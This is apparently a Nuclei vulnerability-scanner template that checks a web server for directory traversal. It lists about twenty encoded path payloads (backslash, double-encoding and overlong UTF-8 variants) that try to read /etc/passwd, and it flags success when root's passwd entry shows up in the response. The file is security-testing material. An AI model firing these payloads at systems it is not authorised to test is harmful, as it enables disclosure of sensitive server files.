44 lines
1.9 KiB
YAML
44 lines
1.9 KiB
YAML
id: directory-traversal
|
|
|
|
info:
|
|
name: Generic Directory Traversal
|
|
author: pentest_swissky
|
|
severity: high
|
|
description: Detect basic directory traversal leading to a leak of sensitive files.
|
|
tags: lfi,fuzz
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/..%5cetc/passwd"
|
|
- "{{BaseURL}}/..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/static/..%5cetc/passwd"
|
|
- "{{BaseURL}}/static/..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
|
|
- "{{BaseURL}}/./../../../../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
|
|
- "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
|
|
- "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
|
|
- "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
|
|
- "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
|
|
- "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|